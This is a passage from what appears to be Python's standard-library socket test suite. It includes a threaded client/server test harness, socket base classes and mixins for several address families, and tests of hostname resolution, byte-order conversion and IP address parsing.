interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
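# Illustrative sketch (not part of the original suite): one classic CAN frame
# in this layout can be packed as
#     struct.pack(can_frame_fmt, 0x123, 8, b"\x11" * 8)
# producing the 16-byte buffer that a PF_CAN/SOCK_RAW socket sends and receives.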
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
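# Illustrative sketch (not part of the original suite): a minimal paired test
# built on ThreadedTCPSocketTest above. The un-prefixed method is the server
# half and runs in the main thread; its '_'-prefixed twin is the client half
# and runs in the client thread; client exceptions are re-raised in tearDown.
#
#     class ExampleEchoTest(ThreadedTCPSocketTest):
#         def testEcho(self):                        # server half
#             conn, addr = self.serv.accept()
#             with conn:
#                 self.assertEqual(conn.recv(1024), MSG)
#         def _testEcho(self):                       # client half
#             self.cli.connect((HOST, self.port))
#             self.cli.sendall(MSG)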
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
